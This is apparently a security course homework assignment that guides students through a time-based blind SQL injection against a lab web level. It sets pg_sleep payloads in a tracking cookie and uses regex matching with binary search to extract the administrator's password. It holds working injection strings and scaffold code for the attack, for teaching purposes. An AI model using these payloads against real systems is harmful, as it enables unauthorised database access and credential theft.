3.2: HW2 (time-delays-info-retrieval)


In this homework, you will solve a Blind SQL injection level using a Python script that implements a binary search. To begin, create the directory below in your course repository, cd into it, and create an initial submission file.

cd <path_to_your_git_repository>
mkdir hw2
cd hw2
touch hw2.py

Then, create a requirements.txt file that contains the requests package.

requirements.txt

requests

Set up your environment in the directory.

virtualenv -p python3 env
source env/bin/activate
pip install -r requirements.txt

Then, visit the lab and launch the level.

In the level, the web application uses a tracking cookie to identify each user visiting the site. To perform the tracking, the backend server inserts the cookie value into a SQL database. If the SQL code that inserts and looks up cookie values is vulnerable to SQL injection and the cookie's value is not sanitized, then an adversary can craft a cookie whose syntax breaks out of the vulnerable statement and executes SQL commands. Even when the results of the query are not exposed directly through the web application, a Blind SQL injection attack is still possible.

Identify tracking cookie

Using an Incognito window, bring up the browser's Developer Tools and visit the level site. When one visits the site for the first time, a session cookie and a tracking cookie are set. Find the "Application" tab and view the cookies for the page in order to see the names and values of the cookies that are used to perform session identification and user tracking. Make a note of the name of each cookie.

While we don't know the actual query being performed, we can demonstrate injection by inserting a single quote in the value of our cookie, followed by SQL code whose effect indicates that the injection succeeded. In hw2.py, use the code below, replacing <FMI> with the name of the tracking cookie. The program defines a function that requests the level site with the tracking cookie set to a specified string. The function returns the elapsed time recorded on the response, which measures how long the request took.

hw2.py

import requests, sys

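# Accept the level URL with or without the scheme and trailing slash.
# str.lstrip('https://') strips a set of characters rather than a prefix,
# so it can eat the start of the hostname; remove the prefix explicitly.
site = sys.argv[1].rstrip('/')
if site.startswith('https://'):
    site = site[len('https://'):]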

url = f'https://{site}/'

def test_cookie(cookie_string):
  cookie_data = {
    '<FMI>' : cookie_string
  }
  resp = requests.get(url, cookies=cookie_data)
  # Seconds between sending the request and receiving the response
  return resp.elapsed.total_seconds()

elapsed = test_cookie("x")
print(f"""Request "x" returned in {elapsed}""")

elapsed = test_cookie("x' || pg_sleep(3) -- ")
print(f"""Request "x' || pg_sleep(3) -- " returned in {elapsed}""")

The program tests two cookie values. Both use a bogus value x. However, the second attempts to break the SQL syntax by inserting a single quote and then calling a PostgreSQL function that sleeps for 3 seconds.

Run the code and validate that you have leveraged the Blind SQL injection vulnerability to perform the sleep.

python hw2.py <Level_URL>
...
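
One way to turn the two timings into a yes/no answer is to compare each measurement against a cutoff halfway between the normal response time and the injected delay. The sketch below is only an assumption about how you might structure this; is_delayed, baseline, and sleep_seconds are hypothetical names that do not appear in the assignment.

```python
def is_delayed(elapsed, baseline, sleep_seconds=3.0):
    """Return True if a request looks like it hit the injected sleep.

    Args:
        elapsed (float): measured request time in seconds
        baseline (float): time of a request sent with a harmless cookie
        sleep_seconds (float): delay requested via pg_sleep
    Returns:
        bool: True when elapsed is past the midpoint between the two cases
    """
    return elapsed > baseline + sleep_seconds / 2
```

In hw2.py, baseline could be the value returned by test_cookie("x"). A midpoint cutoff leaves some room for network jitter in both directions.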

Then, add, commit, and push this initial script and its requirements.txt into your repository.

git add .
git commit -m "Initial script"
git push

Once we have a successful SQL injection, we can use it to test arbitrary conditions in the backend database. One test we can do is to find the length of the administrator's password. Consider the Python snippet below that breaks syntax, then injects a URL-encoded semicolon (%3B) to end the initial SQL statement and run a subsequent PostgreSQL command. The subsequent command performs the PostgreSQL version of an if statement via "select case". Assuming user information is kept in a table called users and that the table contains username and password columns, we can brute-force a range of lengths to find the length of the administrator's password.

for num in range(32):
  if test_cookie(f"""x'%3Bselect case when (username = 'administrator' and length(password) = {num}) then pg_sleep(3) else pg_sleep(0) end from users--""") > 3:
    print(f'Length is {num}')
    break
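
Because every later test reuses the same wrapper around a different condition, it may help to build the cookie value in one place. The helper below is a sketch under that assumption; build_cookie is a hypothetical name, and the string it produces is the same one used in the loop above.

```python
def build_cookie(condition, sleep_seconds=3):
    """Build a cookie value that asks the database to sleep when `condition` is true.

    Args:
        condition (str): SQL boolean expression evaluated against the users table
        sleep_seconds (int): delay passed to pg_sleep when the condition holds
    Returns:
        str: cookie value containing the injected statement
    """
    return (
        f"x'%3Bselect case when ({condition}) "
        f"then pg_sleep({sleep_seconds}) else pg_sleep(0) end from users--"
    )

num = 20
payload = build_cookie(f"username = 'administrator' and length(password) = {num}")
```

The loop body would then call test_cookie(payload) and compare the returned time against the delay.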

Modify your Python program to return the length of the administrator's password. Note that you may need to restart the level if it has timed out before running your script. Once you have successfully modified the script to find the length of the password, add, commit and push it into your repository.

git add .
git commit -m "Find length"
git push

Note that the code above uses a linear search of all lengths. A more efficient approach would be to perform a binary search using < and > tests for the length. While we will be doing such a binary search for the password value itself, you may find implementing a binary search for the password length a good warm-up exercise before continuing.
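
As a rough sketch of that warm-up, the function below narrows down the length using only "is the length greater than n?" answers. The names find_length, longer_than, and upper are hypothetical, and the oracle here is a local stand-in; against the level, longer_than would wrap test_cookie with a length(password) > n condition.

```python
def find_length(longer_than, upper=64):
    """Binary-search a length in the range 0..upper.

    Args:
        longer_than (callable): takes an int n, returns True if length > n
        upper (int): assumed upper bound on the length
    Returns:
        int: the length
    """
    lo, hi = 0, upper
    while lo < hi:
        mid = (lo + hi) // 2
        if longer_than(mid):
            lo = mid + 1   # length is at least mid + 1
        else:
            hi = mid       # length is at most mid
    return lo

# Local stand-in oracle for a 20-character password; counts the queries made.
calls = []
def fake_longer_than(n):
    calls.append(n)
    return 20 > n

length = find_length(fake_longer_than)
```

With an upper bound of 64, this takes 6 queries where the linear loop would need 21 to reach a length of 20.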

PostgreSQL databases support a range of query operators. We can use these operators in the injection to reveal arbitrary information contained within the database without directly observing the results of the injected query. For example, PostgreSQL supports the ~ operator as well as the SIMILAR TO operator for regular expression matching. Such expressions allow one to specify matches on string patterns in a programmatic way.

We will start with the ~ operator for POSIX regular expressions. Key to a program that uses this operator will be the ^ operator for denoting the beginning of a string and the $ operator for denoting the end of it. Consider the case where the administrator's password is 'abc'. If we replace the length check from the previous program with various regular expressions, we can then glean incremental information on the password itself.

password ~ 'b'       // True since password contains b in it
password ~ '^a'      // True since password begins with a
password ~ 'c$'      // True since password ends with c
password ~ '^a$'     // False since password is not a
password ~ '^abc$'   // True since password is abc
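
These semantics can be checked locally before sending anything to the level. The sketch below uses Python's re module as a stand-in for the ~ operator. Python's regex engine is not PostgreSQL's, but the two agree on simple patterns like these. The helper name matches is hypothetical.

```python
import re

password = "abc"  # example value from the text, not a real password

def matches(pattern, value=password):
    """Local analogue of `value ~ pattern`: True if the pattern matches anywhere."""
    return re.search(pattern, value) is not None

results = {p: matches(p) for p in ["b", "^a", "c$", "^a$", "^abc$"]}
```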

The SIMILAR TO operator has slightly different semantics. Rather than matching any part of the string, it matches the entire string. Key to a program that uses this operator will be the % for denoting a wildcard matching any sequence of characters. Examples are shown below again using a password of 'abc'.

password SIMILAR TO 'b'      // False since password is not b
password SIMILAR TO 'a%'     // True since password begins with a
password SIMILAR TO '%c'     // True since password ends with c
password SIMILAR TO 'a'      // False since password is not a
password SIMILAR TO 'abc'    // True since password is abc
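
The whole-string behavior can also be imitated locally. The function below is a deliberately simplified emulation, not PostgreSQL's implementation: it only translates the % and _ wildcards, passes bracket expressions through unchanged, and ignores escapes. The name similar_to is hypothetical.

```python
import re

def similar_to(value, pattern):
    """Rough local stand-in for `value SIMILAR TO pattern`.

    Only % (any sequence) and _ (any single character) are translated;
    everything else is handed to Python's regex engine as-is.
    """
    regex = pattern.replace("%", ".*").replace("_", ".")
    # fullmatch mirrors the requirement that the entire string must match
    return re.fullmatch(regex, value) is not None

checks = [similar_to("abc", p) for p in ["b", "a%", "%c", "a", "abc"]]
```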

More documentation on the SIMILAR TO operator can be found in the pattern matching section of the PostgreSQL documentation.

Choose one of the ~ operator, the SIMILAR TO operator, or the substring() function, and modify your hw2.py program to perform a brute-force attack that reveals the administrator's password one character at a time.

Ensure that your program does the following:

Only searches the valid character set (e.g. string.ascii_lowercase + string.digits or abcdefghijklmnopqrstuvwxyz0123456789)
Incrementally outputs the password as each character is determined
Works on passwords of any length via the use of exact matches after each character round (e.g. password ~ '^password-candidate$' or password SIMILAR TO 'password-candidate')
Calculates the execution time of the attack
Emits the password and exits once found

python hw2.py <Level_URL>
o
o8
o8d
o8dj
o8djb
. . .
o8djbi8zzqhu546up
o8djbi8zzqhu546upw
o8djbi8zzqhu546upwq
o8djbi8zzqhu546upwqh
Done. Found o8djbi8zzqhu546upwqh
Time elapsed is 406.07183370000001
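
The control flow that produces output like the above can be sketched against a local oracle. Everything here is an assumption made for illustration: make_local_oracle stands in for the timing test, linear_search and max_len are hypothetical names, and the secret is a shortened made-up value. Against the level, the oracle would instead send the pattern in a cookie and report whether the response was delayed.

```python
import re
import string
import time

CHARSET = string.ascii_lowercase + string.digits

def make_local_oracle(secret):
    """Return a function that answers `secret ~ pattern` locally (stand-in only)."""
    return lambda pattern: re.search(pattern, secret) is not None

def linear_search(matches, charset=CHARSET, max_len=64):
    """Recover a string one character at a time using a yes/no regex oracle."""
    known = ""
    # The exact-match check ends the loop, so no length is needed up front.
    while not matches(f"^{known}$"):
        if len(known) >= max_len:
            raise RuntimeError("gave up: password longer than max_len")
        for ch in charset:
            if matches(f"^{known}{ch}"):
                known += ch
                print(known)  # incremental output
                break
        else:
            raise RuntimeError("no candidate matched; check the charset")
    return known

start = time.perf_counter()
found = linear_search(make_local_oracle("o8dj"))
print(f"Done. Found {found}")
print(f"Time elapsed is {time.perf_counter() - start}")
```

Passing the oracle in as a parameter keeps the search logic testable without a live level.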

Once working, add, commit and push it into your repository.

git add .
git commit -m "Linear search"
git push

The prior program checked candidate characters one at a time. We can apply binary search to reduce the number of queries required to reveal the password. To do so, we will use the range syntax within regular expressions. Specifically, the square brackets ([ ]) and range syntax (char1-char2) specify a range of characters. Again consider the case where the administrator's password is 'abc'.

Using the range expression with the ~ operator, we then have the following:

password ~ '^[a-z]'  // True since password begins with lowercase letter
password ~ '^a[a-z]' // True since password begins with a followed by a lowercase letter
password ~ '^[0-9]'  // False since password does not begin with a digit

Using the range expression with the SIMILAR TO operator, we then have the following:

password SIMILAR TO '[a-z]%'  // True since password begins with lowercase letter
password SIMILAR TO 'a[a-z]%' // True since password begins with a followed by a lowercase letter
password SIMILAR TO '[0-9]%'  // False since password does not begin with a digit

The range syntax allows us to split the search space of characters, speeding up the execution of our attack. Take the first character as an example. Defining charset as all the candidate characters used in the password, we can calculate the middle of the set (mid):

charset = string.ascii_lowercase + string.digits
mid = len(charset) // 2

We can then perform two queries to check which half of the charset the first character resides in via the regular expressions below:

password ~ '^[{charset[:mid]}]' --
password ~ '^[{charset[mid:]}]' --

Likewise, we can do the same with the SIMILAR TO operator.

password SIMILAR TO '[{charset[:mid]}]%' --
password SIMILAR TO '[{charset[mid:]}]%' --
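
To see what these templates expand to, the sketch below builds both halves for either operator. The name half_patterns and its known parameter (the prefix recovered so far) are hypothetical additions for illustration.

```python
import string

CHARSET = string.ascii_lowercase + string.digits

def half_patterns(known, candidates=CHARSET):
    """Build the left-half and right-half patterns for the next character.

    Args:
        known (str): prefix of the password recovered so far
        candidates (str): characters still possible for the next position
    Returns:
        dict: (left, right) pattern pairs keyed by operator style
    """
    mid = len(candidates) // 2
    left, right = candidates[:mid], candidates[mid:]
    return {
        "posix": (f"^{known}[{left}]", f"^{known}[{right}]"),
        "similar_to": (f"{known}[{left}]%", f"{known}[{right}]%"),
    }

patterns = half_patterns("")
```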

Algorithm

When used in a program, it is unnecessary to check both halves of the search space as done above. If the character is found in one half, it can't be in the other; if it is not found in one half, it must be in the other. A search algorithm takes the range that contains the character, splits it in half, and runs a query on one of the halves to continue the search. Note that if the queried half does not match, the next round splits the opposite half.

For example, to find the first character (say 'm'), a scenario might have the following rounds of querying on the charset 'abcdefghijklmnopqrstuvwxyz0123456789' (assuming the ~ operator is used):

^[abcdefghijklmnopqr] results in a match
^[abcdefghi] does not match (char in [jklmnopqr])
^[jklm] results in match
^[jk] does not match (char in [lm])
^[l] does not match
First character must be m
Try ^m$

Now that we have the first character, we can continue the process for the next character of the password. To do so, using the initial example, since we know that the first character is m, our regular expression can now be updated as shown below:

^m[abcdefghijklmnopqr]

As the example shows, we eliminate half of the search space each time we do a query. This allows us to perform a binary search on each character of the password. Rather than taking O(n) queries per character, where n is the size of the character set, it now takes O(log n). For the 36-character set above, that is 5 or 6 queries per character rather than up to 36.
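
The rounds in the example can be reproduced with a short sketch that halves the candidate set after every query. As before, the oracle is a local stand-in that records each pattern it is asked about; find_next_char, local_oracle, and the secret 'mx7' are hypothetical. The function assumes another character exists, so a caller would run the exact-match check first.

```python
import re
import string

CHARSET = string.ascii_lowercase + string.digits

def find_next_char(matches, known, charset=CHARSET):
    """Binary-search the character that follows `known`.

    Args:
        matches (callable): takes a regex string, returns True on a match
        known (str): prefix of the password recovered so far
        charset (str): candidate characters, assumed to contain the answer
    Returns:
        str: the single character that follows `known`
    """
    candidates = charset
    while len(candidates) > 1:
        mid = len(candidates) // 2
        left = candidates[:mid]
        # One query per round: a miss on the left half implies the right half.
        if matches(f"^{known}[{left}]"):
            candidates = left
        else:
            candidates = candidates[mid:]
    return candidates

queries = []

def local_oracle(pattern, secret="mx7"):
    """Stand-in for the timing test: record the query and answer it locally."""
    queries.append(pattern)
    return re.search(pattern, secret) is not None

first = find_next_char(local_oracle, "")
```

After this call, queries holds the same five patterns listed in the rounds above and first is 'm'.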

Modify hw2.py to implement a program that reveals the password of the administrator account using a binary search algorithm.

Requirements

The program requirements are the same as for the linear search program:

Only searches the valid character set (e.g. string.ascii_lowercase + string.digits or abcdefghijklmnopqrstuvwxyz0123456789)
Incrementally outputs the password as each character is determined
Works on passwords of any length via the use of exact matches after each character round (e.g. password ~ '^password-candidate$' or password SIMILAR TO 'password-candidate')
Calculates the execution time of the attack
Emits the password and exits once found

In addition, for this version, your program must:

Implement a binary search algorithm that uses conjunctions and regular expressions.
Check for errors such as HTTP errors (in case the level site times out for example)
Be concise and modular, defining functions that encapsulate key parts of your program. If you find you have deep levels of indentation, consider the use of a function call.
Have incremental commits to your repository that indicate your progress.
Be well-documented. Throughout the program and especially in function declarations use Python docstrings to specify parameter names and their types as well as provide code documentation for the functionality implemented. An example of a well-documented Python function is shown below

def run_test(login, password, url, num_tests):
    """Records timing data for an individual attack
    Args:
        login (str): login to test
        password (str): password to test
        url (str): URL to test
        num_tests (int): number of tests to run
    Returns:
        float: Average time taken across tests
    """

Rubric

Program correctness
Follows the guidelines described above
Reliably finds the correct alphanumeric password on an arbitrary level using binary search
Checks for errors as part of its operation
Emits timing information detailing its performance
Program is concise, modular, and documented clearly
Multiple incremental commits have been made to the git repository as the program has been developed
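
For the error-checking item, one minimal approach is to inspect the HTTP status of every response before trusting its timing. The sketch below assumes that an expired level answers with a 4xx or 5xx status, which you should confirm against your own level. LevelUnavailable and check_status are hypothetical names.

```python
class LevelUnavailable(Exception):
    """Raised when the level site stops answering normally (hypothetical name)."""

def check_status(status_code):
    """Raise LevelUnavailable for any HTTP status of 400 or above.

    Args:
        status_code (int): status code of the response
    Returns:
        int: the same status code when it is acceptable
    """
    if status_code >= 400:
        raise LevelUnavailable(f"HTTP {status_code}: the level may have timed out")
    return status_code
```

Inside test_cookie this could be called as check_status(resp.status_code). The requests library also provides resp.raise_for_status(), which raises requests.exceptions.HTTPError for the same range of status codes.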